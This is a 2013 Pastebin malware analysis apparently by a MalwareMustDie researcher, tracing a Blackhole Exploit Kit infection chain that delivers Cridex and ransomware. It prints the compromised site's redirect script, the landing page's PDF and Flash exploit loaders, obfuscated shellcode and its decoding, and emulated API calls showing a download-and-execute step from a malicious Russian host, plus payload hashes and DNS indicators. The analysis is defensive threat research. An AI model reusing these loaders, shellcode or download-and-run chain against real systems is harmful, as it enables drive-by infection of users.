SHARE
TWEET

#MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware

MalwareMustDie Feb 20th, 2013 209 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =========================================================
  2. Title: #MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware
  3. #MalwareMustDie! @unixfreaxjp /malware]$ date
  4. Tue Feb 19 15:26:25 JST 2013
  5.  
  6. BlackHole Exploit Kit with Double infector:
  7. Cridex & FakeAV/Ransomer (depends on your request IP)
  8. Landing page: h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  9. IP: 195・210・47・208, 50・31・1・104, 66・249・23・64
  10. payloads:
  11.   2013/02/19  14:07 ff74196d1aacd629ee7af6955c837a24  94,208 readme・exe (cridex)
  12.   2013/02/19  14:06 c182dfc3418573d61fdc7dcc11eb319d 114,688 info・exe (ransomer)
  13. Landing page's PLuginDetect:
  14. 1: http://pastebin.com/mCJy7GEn
  15. 2: http://pastebin.com/LSUCnvN6
  16. =========================================================
  17.  
  18. //---------changes detected in today's infector・・・
  19.  
  20. @unixfreaxjp /malware]$ date
  21. Tue Feb 19 14:17:40 JST 2013
  22. @unixfreaxjp /malware]$ curl hxxp://webworks・investorship・co・jp/page-329・htm
  23. <html>
  24.  <head>
  25.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  26. <title>Please wait</title>
  27.  </head>
  28.  <body>
  29. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  30. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  31.  
  32.  
  33. <script>
  34. var1=49;
  35. var2=var1;
  36. if(var1==var2) {document・location="hxxp://ejjiipprr,ru:8080/forum/links/public_version,php";}
  37. </script>
  38.  
  39.  
  40. </body>
  41.  
  42. @unixfreaxjp /malware]$ myget --head -O/dev/null -d hxxp://webworks・investorship・co・jp/page-329・htm
  43. DEBUG output freebsd9・1・
  44.   :
  45. HTTP/1・1 200 OK
  46. Date: Tue, 19 Feb 2013 05:17:54 GMT
  47. Server: Apache
  48. Last-Modified: Tue, 19 Feb 2013 05:06:13 GMT <======
  49.  
  50. //-----------------download--------
  51.  
  52. --12:56:52--  h00p://webworks・investorship・co・jp/page-329・htm
  53.            => `page-329・htm'
  54. Resolving webworks・investorship・co・jp・・・ seconds 0・00, 117・20・100・110
  55. Caching webworks・investorship・co・jp => 117・20・100・110
  56. Connecting to webworks・investorship・co・jp|117・20・100・110|:80・・・ seconds 0・00, connected・
  57.   :
  58. GET /page-329・htm HTTP/1・0
  59. Host: webworks・investorship・co・jp
  60. HTTP request sent, awaiting response・・・
  61.   :
  62. HTTP/1・1 200 OK
  63. Date: Tue, 19 Feb 2013 03:56:44 GMT
  64. Server: Apache
  65. Last-Modified: Tue, 19 Feb 2013 03:42:14 GMT
  66. ETag: "11850611-1b1-5122f496"
  67. Accept-Ranges: bytes
  68. Content-Length: 433
  69. Connection: close
  70. Content-Type: text/html
  71.   :
  72. 200 OK
  73. Length: 433 [text/html]
  74. 12:56:52 (4・99 MB/s) - `page-329・htm' saved [433/433]
  75.  
  76. //----------------cat-------------------
  77.  
  78. $ cat page-329・htm
  79. <html>
  80.  <head>
  81.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  82. <title>Please wait</title>
  83.  </head>
  84.  <body>
  85. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  86. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  87.  
  88. <script>
  89. var1=49;
  90. var2=var1;
  91. if(var1==var2) {document・location="h00p://ejjiipprr,ru:8080/forum/links/public_version,php";}
  92. </script>
  93.  
  94. //------------- get the landing page----------------
  95.  
  96. // cant connect directly, got 502, looks I got blocked by these moronz now・・
  97.  
  98. --13:02:20--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  99.            => `public_version,php・1'
  100. Resolving ejjiipprr,ru・・・ seconds 0・00, 195・210・47・208, 50・31・1・104, 66・249・23・64
  101. Caching ejjiipprr,ru => 195・210・47・208 50・31・1・104 66・249・23・64
  102. Connecting to ejjiipprr,ru|195・210・47・208|:8080・・・ seconds 0・00, connected・
  103.   :
  104. HTTP/1・1 502 Bad Gateway
  105. Server: nginx/1・0・10
  106. Date: Tue, 19 Feb 2013 04:02:13 GMT
  107. Content-Type: text/html; charset=CP-1251
  108. Connection: keep-alive
  109. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  110. Vary: Accept-Encoding
  111. Content-Length: 0
  112.  
  113.  
  114. // retried・・・・・(bouncer)
  115.  
  116. --13:00:55--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  117.            => `public_version,php'
  118. Connecting to myproxy:myport・・・ seconds 0・00, connected・
  119.   :
  120. GET h00p://ejjiipprr,ru:8080/forum/links/public_version,php HTTP/1・0
  121. Referer: h00p://malwaremustdie・org
  122. Host: ejjiipprr,ru:8080
  123. Connection: keep-alive
  124. Proxy request sent, awaiting response・・・
  125.   :
  126. HTTP/1・1 200 OK
  127. Server: nginx/1・0・10
  128. Date: Tue, 19 Feb 2013 04:00:59 GMT
  129. Content-Type: text/html; charset=CP-1251
  130. Connection: close
  131. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  132. Vary: Accept-Encoding
  133.   :
  134. 200 OK
  135. Length: unspecified [text/html]
  136. 13:01:09 (120・01 KB/s) - `public_version,php' saved [156929] <=== take one・・・
  137.  
  138.  
  139. // retried・・・(gatling IP gunz・・)
  140.  
  141.  
  142. --13:05:53--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  143.            => `public_version,php'
  144. Resolving ejjiipprr,ru・・・ 66・249・23・64, 50・31・1・104, 195・210・47・208
  145. Caching ejjiipprr,ru => 66・249・23・64 50・31・1・104 195・210・47・208
  146. Connecting to ejjiipprr,ru|66・249・23・64|:8080・・・ connected・
  147.   :
  148. GET /forum/links/public_version,php HTTP/1・0
  149.       :
  150. Host: ejjiipprr,ru:8080
  151. HTTP request sent, awaiting response・・・
  152.   :
  153. HTTP/1・1 200 OK
  154. Server: nginx/1・0・10
  155. Date: Tue, 19 Feb 2013 04:05:55 GMT
  156. Content-Type: text/html; charset=CP-1251
  157. Connection: close
  158. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  159. Vary: Accept-Encoding
  160.   :
  161. 200 OK
  162. Length: unspecified [text/html]
  163. 13:05:56 (53・84 KB/s) - `public_version,php' saved [36665]
  164.  
  165.  
  166. //--------two landing page(S)------
  167.  
  168. 2013/02/19  13:17  cdb228f7ee3a261d4f3a5d4b723c085a  57,675 public_version-2,php
  169. 2013/02/19  13:01  f607dcc1b5a95a284238741f886940ac  56,929 public_version,php
  170.  
  171. //------1st plugin detect・・・・・
  172.  
  173.  
  174. // PDFs・・・・
  175.  
  176.  
  177. function p1(){
  178.   var d = document・createElement("object");
  179.   d・setAttribute("data", "/forum/links/public_version,php?edayjh=" + x("de300") + "&mnnq="
  180.    + x("lju") + "&tagwmov=1j:33:32:1l:1g:1i:1o:1n:1o:1i&xllpos=" + x(pdfver・join("・")));
  181.   d・setAttribute("type", "application/pdf");
  182.   document・body・appendChild(d);
  183. }
  184. function p2(){
  185.   var d = document・createElement("object");
  186.   d・setAttribute("data", "/forum/links/public_version,php?lwgbb=" + x("de300") +
  187.   "&lgltly=" + x("r") + "&mlqi=1j:33:32:1l:1g:1i:1o:1n:1o:1i&eshngcjb=" + x(pdfver・join(
  188.   "・")));
  189.   d・setAttribute("type", "application/pdf");
  190.   document・body・appendChild(d);
  191. }
  192.  
  193. // SWF
  194.  
  195. function getCN(){
  196.   return "/forum/links/public_version,php?zivqqsfs=" + x("de300") + "&ljpfu=" + x("hsosw")
  197.    + "&ddpp=1j:33:32:1l:1g:1i:1o:1n:1o:1i&benbw=lvkkbwv"
  198. }
  199.  
  200. function ff2(){
  201.   var oSpan = document・createElement("span");
  202.   var url = "/forum/links/public_version,php?bbbiywar=" + x("de300") + "&wisduk=" + x(
  203.   "toiu") + "&dej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&mkej=fvgwpin";
  204.   oSpan・innerHTML = "
  205. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  206. '><param name='movie' value='" + url + "
  207. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  208.  src='" + url + "
  209. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  210. ' width='10' height='10'></embed></object>";
  211.   document・body・appendChild(oSpan);
  212. }
  213.  
  214. // shellcode
  215.  
  216.  
  217. function getshellcode(){
  218.   var a = "828・・1414!%"
  219.   ・split("")・reverse()・join("");
  220.   return a["replace"](/\%!/g, "%" + "u")
  221. }
  222.  
  223.  
  224. //------ second plugin detect・・・
  225.  
  226.  
  227. // PDFs・・・・(none!)
  228.  
  229. function p1(){
  230.   return false;
  231. }
  232. function p2(){
  233.   return false;
  234. }
  235. function p3(){
  236.   return false;
  237. }
  238.  
  239. // SWF・・・・
  240.  
  241. function getCN(){
  242.   return "/forum/links/public_version,php?dxfcb=" + x("50f08") + "&arfxjm=" + x("qfsnn") +
  243.   "&sxclfr=2v:1k:1m:32:33:1k:1k:31:1j:1o&gakchxt=hxekxtdj"
  244. }
  245.  
  246. function ff2(){
  247.   var oSpan = document・createElement("span");
  248.   var url = "/forum/links/public_version,php?cmfzmg=" + x("50f08") + "&zvdjvx=" + x("pixr"
  249.   ) + "&pxbu=2v:1k:1m:32:33:1k:1k:31:1j:1o&bmobk=jmb";
  250.   oSpan・innerHTML = "
  251. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  252. '><param name='movie' value='" + url + "
  253. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  254.  src='" + url + "
  255. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  256. ' width='10' height='10'></embed></object>";
  257.   document・body・appendChild(oSpan);
  258. }
  259.  
  260. // shellcode・・・・
  261.  
  262. function getshellcode(){
  263.   var a = "8282・・%1414!%"
  264.   ・split("")・reverse()・join("");
  265.   return a["replace"](/\%!/g, "%" + "u")
  266. }
  267.  
  268. //-------------------cracks engine・・・・
  269.  
  270.  
  271. // let's skip the infector this time・・ we must check whether they changed the
  272. // malware payloads or not・・
  273. //
  274. // ========================================
  275. // get the deobs + crack both shellcodes:
  276. // ========================================
  277.  
  278.  
  279. var shellcode1="8282!%51a4!%14d5!%O4eO・・
  280. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  281. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  282. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  283. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  284.  
  285. var shellcode2="8282!%51f4!%34d5!%54eO・・
  286. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  287. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  288. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  289. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  290.  
  291.  
  292. var a = shellcode1・split("")・reverse()・join("");
  293. var xxx=  a["replace"](/\%!/g, "%" + "u");
  294. document・write(xxx);
  295.  
  296. var b = shellcode2・split("")・reverse()・join("");
  297. var yyy=  b["replace"](/\%!/g, "%" + "u");
  298. document・write("\n\n"+yyy);
  299.  
  300. //Output:
  301.  
  302. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  303. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  304. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  305. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  306. 4O%u5d41%u4a15%u2828
  307.  
  308. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  309. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  310. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  311. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  312. 45%u5d43%u4f15%u2828
  313.  
  314. // let's mix the shellcodes now ;-))) experimental!
  315.  
  316. %u4141 % u4141 % u8366 % ufce4 % uebfc % u581O・・
  317. u68a3 % ua324 % u3458 % ua37e % u2O5e % uf31b ・・
  318. u64c3 % u7e79 % u5da3 % ua314 % u1d5c % u2b5O ・・
  319. u3713 % uce5d % ua376 % uOc76 % uf52b % ua34e ・・
  320. u2b5c % uc3be % ua3db % u2O4O % udfa3 % u2d42 ・・
  321. uab38 % u2deb % ucbd7 % u474O % u2846 % u4O28 ・・
  322. uOc2c % u4d5a % u5b4f % u6cef % u2cOc % u5a5e ・・
  323. u6cef % u2d35 % u4cO6 % u4444 % u6cee % u2135 ・・
  324. u422c % uab28 % u24c3 % ud77b % u2c7e % uebab ・・
  325. ubOc4 % ua2d6 % ua126 % u2947 % u1b95 % ua2e2 ・・
  326. uO718 % u474e % u5d5a % uO745 % u4144 % u4346 ・・
  327. u1912 % u124e % u4e19 % u41Oe % u154d % u4219 ・・
  328. u5OOe % u155d % uOe4O % u5d41 % u4a15 % u2828 ・・
  329. uccad % u1c5d % u77c1 % ue81b % ua34c % u1868 ・・
  330. u2e11 % ud35d % u1caf % uadOc % u5dcc % uc179 ・・
  331. uda1O % u2O5c % ue3e9 % u2b25 % u68f2 % ud9c3 ・・
  332. ueb71 % u7bc3 % ua385 % uO84O % u55a8 % u1b24 ・・
  333. u2828 % uab78 % u31e8 % u7d78 % uc4a3 % u76a3 ・・
  334. ua95a % u2cc4 % u2829 % ua528 % uOc74 % uef24 ・・
  335. u1bcO % u79e1 % u6cef % u2835 % u585f % u5c4a ・・
  336. u7ed7 % uad3c % u5de8 % u423e % u7b28 % u7ed7 ・・
  337. ud7d6 % u2O7e % ub4cO % ud7d6 % ua6d7 % u2666 ・・
  338. u5841 % u5a58 % uO65a % u5d5a % u1O12 % u1O18 ・・
  339. u5O17 % u154e % u4319 % u1912 % u124e % u1b1b ・・
  340. u1219 % u4219 % u1912 % uOe47 % u154e % u4319 ・・
  341.  
  342. // I doubt there will be ascii url so・・・
  343. // compile it・・・ get the objects, disasm it and match it with the windows API, see this double scheme works or not・・・
  344.  
  345. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  346. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  347. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  348. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  349. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  350. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  351. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  352. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  353. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  354. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  355. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  356. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  357. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  358. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  359.  
  360. // it works :-)) good!
  361.  
  362. // fetch the mess・・・
  363.  
  364. --14:07:23--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g
  365.            => `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g'
  366. Resolving ejjiipprr,ru・・・ seconds 0・00, 50・31・1・104, 66・249・23・64, 195・210・47・208
  367. Caching ejjiipprr,ru => 50・31・1・104 66・249・23・64 195・210・47・208
  368. Connecting to ejjiipprr,ru|50・31・1・104|:8080・・・ seconds 0・00, connected・
  369.   :
  370. GET /forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g HTTP/1・0
  371. Referer: h00p://malwaremustdie・org
  372. User-Agent: #Smash greedy malware moronz!
  373. Host: ejjiipprr,ru:8080
  374. HTTP request sent, awaiting response・・・
  375.   :
  376. HTTP/1・1 200 OK
  377. Server: nginx/1・0・10
  378. Date: Tue, 19 Feb 2013 05:07:16 GMT
  379. Content-Type: application/x-msdownload
  380. Connection: keep-alive
  381. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  382. Pragma: public
  383. Expires: Tue, 19 Feb 2013 05:07:16 GMT
  384. Cache-Control: must-revalidate, post-check=0, pre-check=0
  385. Cache-Control: private
  386. Content-Disposition: attachment; filename="readme・exe"
  387. Content-Transfer-Encoding: binary
  388. Content-Length: 94208
  389.   :
  390. 200 OK
  391. Length: 94,208 (92K) [application/x-msdownload]
  392. 100%[====================================>] 94,208        98・81K/s
  393. 14:07:25 (98・48 KB/s) - `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g' saved [94208/94208]
  394.   :
  395. GET /forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b HTTP/1・0
  396. Referer: h00p://malwaremustdie・org
  397. User-Agent: #Smash greedy malware moronz!
  398. Host: ejjiipprr,ru:8080
  399. HTTP request sent, awaiting response・・・
  400.   :
  401. HTTP/1・1 200 OK
  402. Server: nginx/1・0・10
  403. Date: Tue, 19 Feb 2013 05:06:40 GMT
  404. Content-Type: application/x-msdownload
  405. Connection: keep-alive
  406. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  407. Pragma: public
  408. Expires: Tue, 19 Feb 2013 05:06:40 GMT
  409. Cache-Control: must-revalidate, post-check=0, pre-check=0
  410. Cache-Control: private
  411. Content-Disposition: attachment; filename="info・exe"
  412. Content-Transfer-Encoding: binary
  413. Content-Length: 114688
  414.   :
  415. 200 OK
  416. Length: 114,688 (112K) [application/x-msdownload]
  417. 100%[====================================>] 114,688      107・17K/s
  418. 14:06:50 (106・95 KB/s) - `public_version,php@kf=31%3A32%3A1i%3A1f%3A1f&ie=1j%3A33%3A32%3A1l%3A1g%3A1i%3A1o%3A1n%3A1o%3A1i&l=1k&xu=h&iu=b' saved [114688/114688]
  419.  
  420.  
  421. // samples evidence・・・
  422.  
  423. info・exe    c182dfc3418573d61fdc7dcc11eb319d
  424. readme・exe  ff74196d1aacd629ee7af6955c837a24
  425.  
  426. // you can see the snapshot of downloaded binary here・・・
  427. // the smaller size is Cridex and the Bigger size is Ransomer/FakeAlert
  428.  
  429. http://urlquery・net/report・php?id=1039316
  430. http://urlquery・net/report・php?id=1039314
  431.  
  432. // or the VT checks here・・・
  433.  
  434. https://www・virustotal・com/en/file/3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84/analysis/1361252424/
  435. https://www・virustotal・com/en/file/6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00/analysis/1361252413/
  436.  
  437. // and anubis for your conveniences:
  438.  
  439. http://anubis・iseclab・org/?action=result&task_id=1ab45db359838bee4dd1cfc29c34675ef
  440. http://anubis・iseclab・org/?action=result&task_id=148f40a21af53f524693c43eb52b6da6e
  441.  
  442.  
  443.  
  444. // ================================
  445. //      NETWORK ANALYSIS
  446. //==================================
  447.  
  448.  
  449. // IP:
  450.  
  451. ejjiipprr,ru:8080 46,175,224,21 - 195,210,47,208 - 50,31,1,104 - 66,249,23,64
  452.  
  453.          A      195・210・47・208, 50・31・1・104, 66・249・23・64
  454.  
  455.  
  456. // SOA:
  457.  
  458. primary name server = ns1・ejjiipprr,ru
  459. responsible mail addr = root・ejjiipprr,ru
  460. serial  = 2012010101
  461. refresh = 604800 (7 days)
  462. retry   = 1800 (30 mins)
  463. expire  = 1800 (30 mins)
  464. default TTL = 60 (1 min)
  465.  
  466. // evil ns lists:
  467.  
  468. ns1・ejjiipprr,ru・       1038    IN      A       41・168・5・140
  469. ns2・ejjiipprr,ru・       1038    IN      A       110・164・58・250
  470. ns3・ejjiipprr,ru・       1038    IN      A       210・71・250・131
  471. ns4・ejjiipprr,ru・       1038    IN      A       203・171・234・53
  472. ns5・ejjiipprr,ru・       60      IN      A       110・164・58・250
  473. ns6・ejjiipprr,ru・       60      IN      A       41・168・5・140
  474.  
  475. // Whois:
  476. domain:        EJJIIPPRR,ru
  477. nserver:       ns1・ejjiipprr,ru・ 41・168・5・140
  478. nserver:       ns2・ejjiipprr,ru・ 110・164・58・250
  479. nserver:       ns3・ejjiipprr,ru・ 210・71・250・131
  480. nserver:       ns4・ejjiipprr,ru・ 203・171・234・53
  481. state:         REGISTERED, DELEGATED, UNVERIFIED
  482. person:        Private Person
  483. registrar:     NAUNET-REG-RIPN
  484. admin-contact: https://client・naunet,ru/c/whoiscontact
  485. created:       2013・02・11
  486. paid-till:     2014・02・11
  487. free-date:     2014・03・14
  488. source:        TCI
  489.  
  490. // Recent current malware moronz group used domains (historical records)
  491. // to be used as reference:
  492.  
  493. emaianem,ru      A      66・249・23・64
  494.  
  495. enakinukia,ru    A      46・175・224・21
  496. exibonapa,ru     A      46・175・224・21
  497. esigbsoahd,ru    A      46・175・224・21
  498. egihurinak,ru    A      46・175・224・21
  499. exiansik,ru      A      46・175・224・21
  500. emaianem,ru      A      46・175・224・21
  501. estipaindo,ru    A      46・175・224・21
  502. epilarikko,ru    A      46・175・224・21
  503. emalenoko,ru     A      46・175・224・21
  504. eminakotpr,ru    A      46・175・224・2
  505.  
  506. enakinukia,ru    A      195・210・47・208
  507. exibonapa,ru     A      195・210・47・208
  508. esigbsoahd,ru    A      195・210・47・208
  509. epianokif,ru     A      195・210・47・208
  510. elistof,ru       A      195・210・47・208
  511. egihurinak,ru    A      195・210・47・208
  512. exiansik,ru      A      195・210・47・208
  513. ewinhdutik,ru    A      195・210・47・208
  514. efjjdopkam,ru    A      195・210・47・208
  515. eipuonam,ru      A      195・210・47・208
  516. emaianem,ru      A      195・210・47・208
  517. epionkalom,ru    A      195・210・47・208
  518. estipaindo,ru    A      195・210・47・208
  519. ejiposhhgio,ru   A      195・210・47・208
  520. epilarikko,ru    A      195・210・47・208
  521. emalenoko,ru     A      195・210・47・208
  522. eminakotpr,ru    A      195・210・47・208
  523.  
  524.  
  525. // all are using same evil dns :
  526.  
  527. 41・168・5・140
  528. 110・164・58・250
  529. 210・71・250・131
  530. 203・171・234・53
  531. 110・164・58・250
  532. 41・168・5・140
  533.  
  534.  
  535. ------
  536. #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top